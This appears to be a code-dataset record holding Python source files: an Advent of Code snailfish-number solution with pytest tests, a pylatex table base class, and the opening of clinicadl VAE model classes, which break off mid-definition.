import math
from typing import Union, Tuple, NamedTuple, Optional, List
import pytest
@pytest.mark.parametrize(
"input_string, expected",
[
("1", [1]),
("[1,2]", [(1, 2)]),
("[[[7,1],2],3]\n[[1,7],7]", [(((7, 1), 2), 3), ((1, 7), 7)]),
],
)
def test_parse_input(input_string, expected):
assert parse_input(input_string) == expected
def parse_input(input_string: str):
return [parse_line(line) for line in input_string.strip().split("\n")]
def parse_line(line: str):
return nested_lists_to_nested_tuples(json.loads(line))
def nested_lists_to_nested_tuples(as_list):
if not isinstance(as_list, List):
return as_list
return tuple(nested_lists_to_nested_tuples(i) for i in as_list)
class ExplosionSpec(NamedTuple):
index: Tuple[int, ...]
left_value: int
right_value: int
@pytest.mark.parametrize(
"snail_fish_number, index_so_far, expected",
[
((1, 2), None, None),
((1, 2), (0,), None),
((1, 2), (0, 0), None),
((1, 2), (0, 0, 0), None),
(
(1, 2),
(0, 0, 0, 0),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(((1, 2), 3), None, None),
(((1, 2), 3), (0, 0), None),
(
((1, 2), 3),
(0, 0, 0),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
(((1, 2), 3), 4),
(0, 0),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
((((1, 2), 3), 4), 5),
(0,),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
(((((1, 2), 3), 4), 5), 6),
None,
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
(((((9, 8), 1), 2), 3), 4),
None,
ExplosionSpec(index=(0, 0, 0, 0), left_value=9, right_value=8),
),
(
(1, (2, (3, (4, (5, 6))))),
None,
ExplosionSpec(index=(1, 1, 1, 1), left_value=5, right_value=6),
),
(
(1, (2, (3, ((4, 5), 6)))),
None,
ExplosionSpec(index=(1, 1, 1, 0), left_value=4, right_value=5),
),
(
(((((1, 2), 3), 4), 5), (6, (7, (8, (9, 10))))),
None,
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
],
)
def test_find_first_explosion(snail_fish_number, index_so_far, expected):
assert (
find_first_explosion(snail_fish_number, index_so_far=index_so_far) == expected
)
def find_first_explosion(
snail_fish_number, index_so_far: Tuple[int, ...] = None
) -> Optional[ExplosionSpec]:
if index_so_far is None:
index_so_far = tuple()
if isinstance(snail_fish_number, int):
return None
if len(index_so_far) == 4:
return ExplosionSpec(
index=index_so_far,
left_value=snail_fish_number[0],
right_value=snail_fish_number[1],
)
else:
for i in range(len(snail_fish_number)):
new_index_so_far = index_so_far + (i,)
result = find_first_explosion(
snail_fish_number=snail_fish_number[i], index_so_far=new_index_so_far
)
if result:
return result
return None
def find_left_neighbor_index(
snail_fish_number, index: Tuple[int, ...]
) -> Optional[Tuple[int, ...]]:
if not any(index):
return None
else:
last_one_at = find_index_of_last_value(index, 1)
left_index = index[0:last_one_at] + (0,)
while is_tuple_at_location(snail_fish_number, left_index):
left_index += (1,)
return left_index
def is_tuple_at_location(snail_fish_number, index: Tuple[int, ...]):
value_at_index = get_value_at_index(
snail_fish_number=snail_fish_number, index=index
)
return isinstance(value_at_index, tuple)
def get_value_at_index(snail_fish_number, index):
value_at_index = snail_fish_number
for i in index:
value_at_index = value_at_index[i]
return value_at_index
def find_index_of_last_value(tt: Tuple[int, ...], target_value):
for i in reversed(range(len(tt))):
if tt[i] == target_value:
return i
return None
@pytest.mark.parametrize(
"snail_fish_number, index, expected",
[
((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), None),
((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), (1, 1, 1, 0)),
((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0)),
((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0, 1)),
(((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (0, 1, 1, 1)),
],
)
def test_find_left_neighbor_index(snail_fish_number, index, expected):
assert (
find_left_neighbor_index(snail_fish_number=snail_fish_number, index=index)
== expected
)
def find_right_neighbor_index(snail_fish_number, index: Tuple[int, ...]):
if all(index):
return None
else:
last_zero_at = find_index_of_last_value(index, 0)
left_index = index[:last_zero_at] + (1,)
while is_tuple_at_location(snail_fish_number, left_index):
left_index += (0,)
return left_index
@pytest.mark.parametrize(
"snail_fish_number, index, expected",
[
((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), (0, 0, 0, 1)),
((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), None),
((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
(((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (1, 0, 0, 1)),
],
)
def test_find_right_neighbor_index(snail_fish_number, index, expected):
assert (
find_right_neighbor_index(snail_fish_number=snail_fish_number, index=index)
== expected
)
class ExplodeReplaceCommand:
def __init__(self, spec: ExplosionSpec, snail_fish_number):
self.snail_fish_number = snail_fish_number
self.explosion_spec = spec
self.left_index = find_left_neighbor_index(
snail_fish_number=snail_fish_number, index=spec.index
)
self.right_index = find_right_neighbor_index(
snail_fish_number=snail_fish_number, index=spec.index
)
def get_value(self, index: Tuple[int, ...]) -> Union[Tuple, int]:
if index == self.explosion_spec.index:
return 0
value_at_index = get_value_at_index(
snail_fish_number=self.snail_fish_number, index=index
)
if index == self.left_index:
return value_at_index + self.explosion_spec.left_value
if index == self.right_index:
return value_at_index + self.explosion_spec.right_value
if isinstance(value_at_index, int):
return value_at_index
return tuple(self.get_value(index + (i,)) for i in range(len(value_at_index)))
def explode(snail_fish_number, index_so_far: Tuple[int, ...] = None):
explosion_spec = find_first_explosion(snail_fish_number)
if not explosion_spec:
return snail_fish_number
return ExplodeReplaceCommand(
spec=explosion_spec, snail_fish_number=snail_fish_number
).get_value(tuple())
@pytest.mark.parametrize(
"snail_fish_number, expected",
[
(((((0, 1), 2), 3), 4), ((((0, 1), 2), 3), 4)),
((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
((7, (6, (5, (4, (3, 2))))), (7, (6, (5, (7, 0))))),
(((6, (5, (4, (3, 2)))), 1), ((6, (5, (7, 0))), 3)),
(
((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
),
(
((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
((3, (2, (8, 0))), (9, (5, (7, 0)))),
),
],
)
def test_explode(snail_fish_number, expected):
assert explode(snail_fish_number) == expected
class SplitSfnCommand:
def __init__(self):
self.split_count = 0
def split(self, snail_fish_number):
if self.split_count > 0:
return snail_fish_number
if isinstance(snail_fish_number, int):
if snail_fish_number >= 10:
return self.split_number(snail_fish_number)
else:
return snail_fish_number
return tuple(self.split(sub_number) for sub_number in snail_fish_number)
def split_number(self, number):
self.split_count += 1
a = math.floor(number / 2.0)
b = number - a
return a, b
@pytest.mark.parametrize(
"snail_fish_number, expected",
[
((1, 2), (1, 2)),
((10, 2), ((5, 5), 2)),
((11, 2), ((5, 6), 2)),
((1, 12), (1, (6, 6))),
((1, 13), (1, (6, 7))),
((1, (2, 10)), (1, (2, (5, 5)))),
((1, (2, (3, 10))), (1, (2, (3, (5, 5))))),
((11, 12), ((5, 6), 12)),
],
)
def test_split_sfn(snail_fish_number, expected):
assert SplitSfnCommand().split(snail_fish_number) == expected
def sfn_add(sfn_a, sfn_b):
return sfn_a, sfn_b
@pytest.mark.parametrize(
"sfn_a, sfn_b, expected",
[
((1, 2), (3, 4), ((1, 2), (3, 4))),
((1, (2, (3, 4))), ((5, 6), 7), ((1, (2, (3, 4))), ((5, 6), 7))),
],
)
def test_sfn_add(sfn_a, sfn_b, expected):
assert sfn_add(sfn_a, sfn_b) == expected
def sfn_reduce(sfn):
previous_sfn = None
while sfn != previous_sfn:
while sfn != previous_sfn:
previous_sfn = sfn
sfn = explode(previous_sfn)
sfn = SplitSfnCommand().split(sfn)
return sfn
@pytest.mark.parametrize(
"sfn, expected",
[
((1, 2), (1, 2)),
((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
(
((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
((3, (2, (8, 0))), (9, (5, (7, 0)))),
),
((1, 13), (1, (6, 7))),
((12, 13), ((6, 6), (6, 7))),
(
(((((4, 3), 4), 4), (7, ((8, 4), 9))), (1, 1)),
((((0, 7), 4), ((7, 8), (6, 0))), (8, 1)),
),
],
)
def test_sfn_reduce(sfn, expected):
assert sfn_reduce(sfn) == expected
def add_and_reduce_many_sfns(sfns: List[Tuple]):
result = sfns[0]
for sfn in sfns[1:]:
result = sfn_reduce(sfn_add(result, sfn))
return result
def test_add_and_reduce_many_sfns():
assert add_and_reduce_many_sfns(
[
(((0, (4, 5)), (0, 0)), (((4, 5), (2, 6)), (9, 5))),
(7, (((3, 7), (4, 3)), ((6, 3), (8, 8)))),
((2, ((0, 8), (3, 4))), (((6, 7), 1), (7, (1, 6)))),
((((2, 4), 7), (6, (0, 5))), (((6, 8), (2, 8)), ((2, 1), (4, 5)))),
(7, (5, ((3, 8), (1, 4)))),
((2, (2, 2)), (8, (8, 1))),
(2, 9),
(1, (((9, 3), 9), ((9, 0), (0, 7)))),
(((5, (7, 4)), 7), 1),
((((4, 2), 2), 6), (8, 7)),
]
) == (
(((8, 7), (7, 7)), ((8, 6), (7, 7))),
(((0, 7), (6, 6)), (8, 7)),
)
def sfn_magnitude(sfn):
if isinstance(sfn, int):
return sfn
return 3 * sfn_magnitude(sfn[0]) + 2 * sfn_magnitude(sfn[1])
@pytest.mark.parametrize(
"sfn, expected",
[
((1, 2), 7),
((9, 1), 29),
(((1, 2), ((3, 4), 5)), 143),
(((((8, 7), (7, 7)), ((8, 6), (7, 7))), (((0, 7), (6, 6)), (8, 7))), 3488),
],
)
def test_sfn_magnitude(sfn, expected):
assert sfn_magnitude(sfn) == expected
def do_homework(sfns):
return sfn_magnitude(add_and_reduce_many_sfns(sfns))
EXAMPLE_HOMEWORK = [
(((0, (5, 8)), ((1, 7), (9, 6))), ((4, (1, 2)), ((1, 4), 2))),
(((5, (2, 8)), 4), (5, ((9, 9), 0))),
(6, (((6, 2), (5, 6)), ((7, 6), (4, 7)))),
(((6, (0, 7)), (0, 9)), (4, (9, (9, 0)))),
(((7, (6, 4)), (3, (1, 3))), (((5, 5), 1), 9)),
((6, ((7, 3), (3, 2))), (((3, 8), (5, 7)), 4)),
((((5, 4), (7, 7)), 8), ((8, 3), 8)),
((9, 3), ((9, 9), (6, (4, 9)))),
((2, ((7, 7), 7)), ((5, 8), ((9, 3), (0, 2)))),
((((5, 2), 5), (8, (3, 7))), ((5, (7, 5)), (4, 4))),
]
def test_do_homework():
assert do_homework(EXAMPLE_HOMEWORK) == 4140
def do_homework_part_2(sfns):
max_value = 0
for pair in get_all_pairs(sfns):
max_value = max(max_value, do_homework(pair))
return max_value
def get_all_pairs(sfns):
for i in range(len(sfns)):
for j in range(len(sfns)):
if i != j:
yield [sfns[i], sfns[j]]
def test_do_homework_part_2():
assert do_homework_part_2(EXAMPLE_HOMEWORK) == 3993
def part_a(filepath: str):
with open(filepath, "r") as file:
sfns = parse_input(file.read())
return do_homework(sfns)
def part_b(filepath: str):
with open(filepath, "r") as file:
sfns = parse_input(file.read())
return do_homework_part_2(sfns)
if __name__ == "__main__":
day = 18
input_file = f"../puzzle_input/day{day}.txt"
print(f"The answer to {day}A is: {part_a(input_file)}")
print(f"The answer to {day}B is: {part_b(input_file)}") | src/day18.py | import json
import math
from typing import Union, Tuple, NamedTuple, Optional, List
import pytest
@pytest.mark.parametrize(
"input_string, expected",
[
("1", [1]),
("[1,2]", [(1, 2)]),
("[[[7,1],2],3]\n[[1,7],7]", [(((7, 1), 2), 3), ((1, 7), 7)]),
],
)
def test_parse_input(input_string, expected):
assert parse_input(input_string) == expected
def parse_input(input_string: str):
return [parse_line(line) for line in input_string.strip().split("\n")]
def parse_line(line: str):
return nested_lists_to_nested_tuples(json.loads(line))
def nested_lists_to_nested_tuples(as_list):
if not isinstance(as_list, List):
return as_list
return tuple(nested_lists_to_nested_tuples(i) for i in as_list)
class ExplosionSpec(NamedTuple):
index: Tuple[int, ...]
left_value: int
right_value: int
@pytest.mark.parametrize(
"snail_fish_number, index_so_far, expected",
[
((1, 2), None, None),
((1, 2), (0,), None),
((1, 2), (0, 0), None),
((1, 2), (0, 0, 0), None),
(
(1, 2),
(0, 0, 0, 0),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(((1, 2), 3), None, None),
(((1, 2), 3), (0, 0), None),
(
((1, 2), 3),
(0, 0, 0),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
(((1, 2), 3), 4),
(0, 0),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
((((1, 2), 3), 4), 5),
(0,),
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
(((((1, 2), 3), 4), 5), 6),
None,
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
(
(((((9, 8), 1), 2), 3), 4),
None,
ExplosionSpec(index=(0, 0, 0, 0), left_value=9, right_value=8),
),
(
(1, (2, (3, (4, (5, 6))))),
None,
ExplosionSpec(index=(1, 1, 1, 1), left_value=5, right_value=6),
),
(
(1, (2, (3, ((4, 5), 6)))),
None,
ExplosionSpec(index=(1, 1, 1, 0), left_value=4, right_value=5),
),
(
(((((1, 2), 3), 4), 5), (6, (7, (8, (9, 10))))),
None,
ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
),
],
)
def test_find_first_explosion(snail_fish_number, index_so_far, expected):
assert (
find_first_explosion(snail_fish_number, index_so_far=index_so_far) == expected
)
def find_first_explosion(
snail_fish_number, index_so_far: Tuple[int, ...] = None
) -> Optional[ExplosionSpec]:
if index_so_far is None:
index_so_far = tuple()
if isinstance(snail_fish_number, int):
return None
if len(index_so_far) == 4:
return ExplosionSpec(
index=index_so_far,
left_value=snail_fish_number[0],
right_value=snail_fish_number[1],
)
else:
for i in range(len(snail_fish_number)):
new_index_so_far = index_so_far + (i,)
result = find_first_explosion(
snail_fish_number=snail_fish_number[i], index_so_far=new_index_so_far
)
if result:
return result
return None
def find_left_neighbor_index(
snail_fish_number, index: Tuple[int, ...]
) -> Optional[Tuple[int, ...]]:
if not any(index):
return None
else:
last_one_at = find_index_of_last_value(index, 1)
left_index = index[0:last_one_at] + (0,)
while is_tuple_at_location(snail_fish_number, left_index):
left_index += (1,)
return left_index
def is_tuple_at_location(snail_fish_number, index: Tuple[int, ...]):
value_at_index = get_value_at_index(
snail_fish_number=snail_fish_number, index=index
)
return isinstance(value_at_index, tuple)
def get_value_at_index(snail_fish_number, index):
value_at_index = snail_fish_number
for i in index:
value_at_index = value_at_index[i]
return value_at_index
def find_index_of_last_value(tt: Tuple[int, ...], target_value):
for i in reversed(range(len(tt))):
if tt[i] == target_value:
return i
return None
@pytest.mark.parametrize(
"snail_fish_number, index, expected",
[
((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), None),
((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), (1, 1, 1, 0)),
((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0)),
((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0, 1)),
(((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (0, 1, 1, 1)),
],
)
def test_find_left_neighbor_index(snail_fish_number, index, expected):
assert (
find_left_neighbor_index(snail_fish_number=snail_fish_number, index=index)
== expected
)
def find_right_neighbor_index(snail_fish_number, index: Tuple[int, ...]):
if all(index):
return None
else:
last_zero_at = find_index_of_last_value(index, 0)
left_index = index[:last_zero_at] + (1,)
while is_tuple_at_location(snail_fish_number, left_index):
left_index += (0,)
return left_index
@pytest.mark.parametrize(
"snail_fish_number, index, expected",
[
((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), (0, 0, 0, 1)),
((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), None),
((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
(((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (1, 0, 0, 1)),
],
)
def test_find_right_neighbor_index(snail_fish_number, index, expected):
assert (
find_right_neighbor_index(snail_fish_number=snail_fish_number, index=index)
== expected
)
class ExplodeReplaceCommand:
def __init__(self, spec: ExplosionSpec, snail_fish_number):
self.snail_fish_number = snail_fish_number
self.explosion_spec = spec
self.left_index = find_left_neighbor_index(
snail_fish_number=snail_fish_number, index=spec.index
)
self.right_index = find_right_neighbor_index(
snail_fish_number=snail_fish_number, index=spec.index
)
def get_value(self, index: Tuple[int, ...]) -> Union[Tuple, int]:
if index == self.explosion_spec.index:
return 0
value_at_index = get_value_at_index(
snail_fish_number=self.snail_fish_number, index=index
)
if index == self.left_index:
return value_at_index + self.explosion_spec.left_value
if index == self.right_index:
return value_at_index + self.explosion_spec.right_value
if isinstance(value_at_index, int):
return value_at_index
return tuple(self.get_value(index + (i,)) for i in range(len(value_at_index)))
def explode(snail_fish_number, index_so_far: Tuple[int, ...] = None):
explosion_spec = find_first_explosion(snail_fish_number)
if not explosion_spec:
return snail_fish_number
return ExplodeReplaceCommand(
spec=explosion_spec, snail_fish_number=snail_fish_number
).get_value(tuple())
@pytest.mark.parametrize(
"snail_fish_number, expected",
[
(((((0, 1), 2), 3), 4), ((((0, 1), 2), 3), 4)),
((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
((7, (6, (5, (4, (3, 2))))), (7, (6, (5, (7, 0))))),
(((6, (5, (4, (3, 2)))), 1), ((6, (5, (7, 0))), 3)),
(
((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
),
(
((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
((3, (2, (8, 0))), (9, (5, (7, 0)))),
),
],
)
def test_explode(snail_fish_number, expected):
assert explode(snail_fish_number) == expected
class SplitSfnCommand:
def __init__(self):
self.split_count = 0
def split(self, snail_fish_number):
if self.split_count > 0:
return snail_fish_number
if isinstance(snail_fish_number, int):
if snail_fish_number >= 10:
return self.split_number(snail_fish_number)
else:
return snail_fish_number
return tuple(self.split(sub_number) for sub_number in snail_fish_number)
def split_number(self, number):
self.split_count += 1
a = math.floor(number / 2.0)
b = number - a
return a, b
@pytest.mark.parametrize(
"snail_fish_number, expected",
[
((1, 2), (1, 2)),
((10, 2), ((5, 5), 2)),
((11, 2), ((5, 6), 2)),
((1, 12), (1, (6, 6))),
((1, 13), (1, (6, 7))),
((1, (2, 10)), (1, (2, (5, 5)))),
((1, (2, (3, 10))), (1, (2, (3, (5, 5))))),
((11, 12), ((5, 6), 12)),
],
)
def test_split_sfn(snail_fish_number, expected):
assert SplitSfnCommand().split(snail_fish_number) == expected
def sfn_add(sfn_a, sfn_b):
return sfn_a, sfn_b
@pytest.mark.parametrize(
"sfn_a, sfn_b, expected",
[
((1, 2), (3, 4), ((1, 2), (3, 4))),
((1, (2, (3, 4))), ((5, 6), 7), ((1, (2, (3, 4))), ((5, 6), 7))),
],
)
def test_sfn_add(sfn_a, sfn_b, expected):
assert sfn_add(sfn_a, sfn_b) == expected
def sfn_reduce(sfn):
previous_sfn = None
while sfn != previous_sfn:
while sfn != previous_sfn:
previous_sfn = sfn
sfn = explode(previous_sfn)
sfn = SplitSfnCommand().split(sfn)
return sfn
@pytest.mark.parametrize(
"sfn, expected",
[
((1, 2), (1, 2)),
((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
(
((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
((3, (2, (8, 0))), (9, (5, (7, 0)))),
),
((1, 13), (1, (6, 7))),
((12, 13), ((6, 6), (6, 7))),
(
(((((4, 3), 4), 4), (7, ((8, 4), 9))), (1, 1)),
((((0, 7), 4), ((7, 8), (6, 0))), (8, 1)),
),
],
)
def test_sfn_reduce(sfn, expected):
assert sfn_reduce(sfn) == expected
def add_and_reduce_many_sfns(sfns: List[Tuple]):
result = sfns[0]
for sfn in sfns[1:]:
result = sfn_reduce(sfn_add(result, sfn))
return result
def test_add_and_reduce_many_sfns():
assert add_and_reduce_many_sfns(
[
(((0, (4, 5)), (0, 0)), (((4, 5), (2, 6)), (9, 5))),
(7, (((3, 7), (4, 3)), ((6, 3), (8, 8)))),
((2, ((0, 8), (3, 4))), (((6, 7), 1), (7, (1, 6)))),
((((2, 4), 7), (6, (0, 5))), (((6, 8), (2, 8)), ((2, 1), (4, 5)))),
(7, (5, ((3, 8), (1, 4)))),
((2, (2, 2)), (8, (8, 1))),
(2, 9),
(1, (((9, 3), 9), ((9, 0), (0, 7)))),
(((5, (7, 4)), 7), 1),
((((4, 2), 2), 6), (8, 7)),
]
) == (
(((8, 7), (7, 7)), ((8, 6), (7, 7))),
(((0, 7), (6, 6)), (8, 7)),
)
def sfn_magnitude(sfn):
if isinstance(sfn, int):
return sfn
return 3 * sfn_magnitude(sfn[0]) + 2 * sfn_magnitude(sfn[1])
@pytest.mark.parametrize(
"sfn, expected",
[
((1, 2), 7),
((9, 1), 29),
(((1, 2), ((3, 4), 5)), 143),
(((((8, 7), (7, 7)), ((8, 6), (7, 7))), (((0, 7), (6, 6)), (8, 7))), 3488),
],
)
def test_sfn_magnitude(sfn, expected):
assert sfn_magnitude(sfn) == expected
def do_homework(sfns):
return sfn_magnitude(add_and_reduce_many_sfns(sfns))
EXAMPLE_HOMEWORK = [
(((0, (5, 8)), ((1, 7), (9, 6))), ((4, (1, 2)), ((1, 4), 2))),
(((5, (2, 8)), 4), (5, ((9, 9), 0))),
(6, (((6, 2), (5, 6)), ((7, 6), (4, 7)))),
(((6, (0, 7)), (0, 9)), (4, (9, (9, 0)))),
(((7, (6, 4)), (3, (1, 3))), (((5, 5), 1), 9)),
((6, ((7, 3), (3, 2))), (((3, 8), (5, 7)), 4)),
((((5, 4), (7, 7)), 8), ((8, 3), 8)),
((9, 3), ((9, 9), (6, (4, 9)))),
((2, ((7, 7), 7)), ((5, 8), ((9, 3), (0, 2)))),
((((5, 2), 5), (8, (3, 7))), ((5, (7, 5)), (4, 4))),
]
def test_do_homework():
assert do_homework(EXAMPLE_HOMEWORK) == 4140
def do_homework_part_2(sfns):
max_value = 0
for pair in get_all_pairs(sfns):
max_value = max(max_value, do_homework(pair))
return max_value
def get_all_pairs(sfns):
for i in range(len(sfns)):
for j in range(len(sfns)):
if i != j:
yield [sfns[i], sfns[j]]
def test_do_homework_part_2():
assert do_homework_part_2(EXAMPLE_HOMEWORK) == 3993
def part_a(filepath: str):
with open(filepath, "r") as file:
sfns = parse_input(file.read())
return do_homework(sfns)
def part_b(filepath: str):
with open(filepath, "r") as file:
sfns = parse_input(file.read())
return do_homework_part_2(sfns)
if __name__ == "__main__":
day = 18
input_file = f"../puzzle_input/day{day}.txt"
print(f"The answer to {day}A is: {part_a(input_file)}")
print(f"The answer to {day}B is: {part_b(input_file)}") | 0.736021 | 0.688516 |
from . import LatexObject, Environment, Command
from ..utils import dumps_list
from ..package import Package
from collections import Counter
import re
def _get_table_width(table_spec):
"""Calculate the width of a table based on its spec.
:param table_spec:
:type table_spec: str
:return:
:rtype: int
"""
column_letters = ['l', 'c', 'r', 'p', 'm', 'b']
# Remove things like {\bfseries}
cleaner_spec = re.sub(r'{[^}]*}', '', table_spec)
spec_counter = Counter(cleaner_spec)
return sum(spec_counter[l] for l in column_letters)
class TabularBase(Environment):
"""A class that is used as a base for all table classes.
:param table_spec:
:param data:
:param pos:
:type table_spec: str
:type data: list
:type pos: list
"""
def __init__(self, table_spec, data=None, pos=None, **kwargs):
self.width = _get_table_width(table_spec)
super().__init__(data=data, options=pos,
arguments=table_spec, **kwargs)
def add_hline(self, start=None, end=None):
"""Add a horizontal line to the table.
:param start:
:param end:
:type start: int
:type end: int
"""
if start is None and end is None:
self.append(r'\hline')
else:
if start is None:
start = 1
elif end is None:
end = self.width
self.append(Command('cline', str(start) + '-' + str(end)))
def add_empty_row(self):
"""Add an empty row to the table."""
self.append((self.width - 1) * '&' + r'\\')
def add_row(self, cells, escape=False, mapper=None):
"""Add a row of cells to the table.
:param cells:
:param escape:
:type cells: tuple
:type escape: bool
"""
# Propegate packages used in cells
for c in cells:
if isinstance(c, LatexObject):
for p in c.packages:
self.packages.add(p)
self.append(dumps_list(cells, escape=escape, token='&', mapper=mapper)
+ r'\\')
def add_multicolumn(self, size, align, content, cells=None, escape=False):
"""Add a multicolumn of width size to the table, with cell content.
:param size:
:param align:
:param content:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type cells: tuple
:type escape: bool
"""
self.append(Command('multicolumn', arguments=(size, align, content)))
if cells is not None:
self.add_row(cells)
else:
self.append(r'\\')
def add_multirow(self, size, align, content, hlines=True, cells=None,
escape=False):
"""Add a multirow of height size to the table, with cell content.
:param size:
:param align:
:param content:
:param hlines:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type hlines: bool
:type cells: tuple
:type escape: bool
"""
self.append(Command('multirow', arguments=(size, align, content)))
self.packages.add(Package('multirow'))
if cells is not None:
for i, row in enumerate(cells):
if hlines and i:
self.add_hline(2)
self.append('&')
self.add_row(row)
else:
for i in range(size):
self.add_empty_row() | pylatex/base_classes/table.py | from . import LatexObject, Environment, Command
from ..utils import dumps_list
from ..package import Package
from collections import Counter
import re
def _get_table_width(table_spec):
"""Calculate the width of a table based on its spec.
:param table_spec:
:type table_spec: str
:return:
:rtype: int
"""
column_letters = ['l', 'c', 'r', 'p', 'm', 'b']
# Remove things like {\bfseries}
cleaner_spec = re.sub(r'{[^}]*}', '', table_spec)
spec_counter = Counter(cleaner_spec)
return sum(spec_counter[l] for l in column_letters)
class TabularBase(Environment):
"""A class that is used as a base for all table classes.
:param table_spec:
:param data:
:param pos:
:type table_spec: str
:type data: list
:type pos: list
"""
def __init__(self, table_spec, data=None, pos=None, **kwargs):
self.width = _get_table_width(table_spec)
super().__init__(data=data, options=pos,
arguments=table_spec, **kwargs)
def add_hline(self, start=None, end=None):
"""Add a horizontal line to the table.
:param start:
:param end:
:type start: int
:type end: int
"""
if start is None and end is None:
self.append(r'\hline')
else:
if start is None:
start = 1
elif end is None:
end = self.width
self.append(Command('cline', str(start) + '-' + str(end)))
def add_empty_row(self):
"""Add an empty row to the table."""
self.append((self.width - 1) * '&' + r'\\')
def add_row(self, cells, escape=False, mapper=None):
"""Add a row of cells to the table.
:param cells:
:param escape:
:type cells: tuple
:type escape: bool
"""
# Propegate packages used in cells
for c in cells:
if isinstance(c, LatexObject):
for p in c.packages:
self.packages.add(p)
self.append(dumps_list(cells, escape=escape, token='&', mapper=mapper)
+ r'\\')
def add_multicolumn(self, size, align, content, cells=None, escape=False):
"""Add a multicolumn of width size to the table, with cell content.
:param size:
:param align:
:param content:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type cells: tuple
:type escape: bool
"""
self.append(Command('multicolumn', arguments=(size, align, content)))
if cells is not None:
self.add_row(cells)
else:
self.append(r'\\')
def add_multirow(self, size, align, content, hlines=True, cells=None,
escape=False):
"""Add a multirow of height size to the table, with cell content.
:param size:
:param align:
:param content:
:param hlines:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type hlines: bool
:type cells: tuple
:type escape: bool
"""
self.append(Command('multirow', arguments=(size, align, content)))
self.packages.add(Package('multirow'))
if cells is not None:
for i, row in enumerate(cells):
if hlines and i:
self.add_hline(2)
self.append('&')
self.add_row(row)
else:
for i in range(size):
self.add_empty_row() | 0.748904 | 0.474996 |
import torch
from torch import nn
from clinicadl.utils.network.vae.base_vae import BaseVAE
from clinicadl.utils.network.vae.vae_utils import (
DecoderLayer3D,
EncoderLayer3D,
Flatten,
Unflatten3D,
VAE_Decoder,
VAE_Encoder,
)
class VanillaDenseVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
n_conv = 4
io_layer_channel = 32
encoder = VAE_Encoder(
input_shape=input_size,
feature_size=feature_size,
latent_dim=1,
n_conv=n_conv,
first_layer_channels=io_layer_channel,
)
mu_layer = nn.Linear(feature_size, latent_space_size)
var_layer = nn.Linear(feature_size, latent_space_size)
decoder = VAE_Decoder(
input_shape=input_size,
latent_size=latent_space_size,
feature_size=feature_size,
latent_dim=1,
n_conv=n_conv,
last_layer_channels=io_layer_channel,
padding=encoder.decoder_padding,
)
super(VanillaDenseVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class VanillaSpatialVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
feature_channels = 64
latent_channels = 1
n_conv = 4
io_layer_channel = 32
encoder = VAE_Encoder(
input_shape=input_size,
feature_size=feature_channels,
latent_dim=2,
n_conv=n_conv,
first_layer_channels=io_layer_channel,
)
mu_layer = nn.Conv2d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
var_layer = nn.Conv2d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
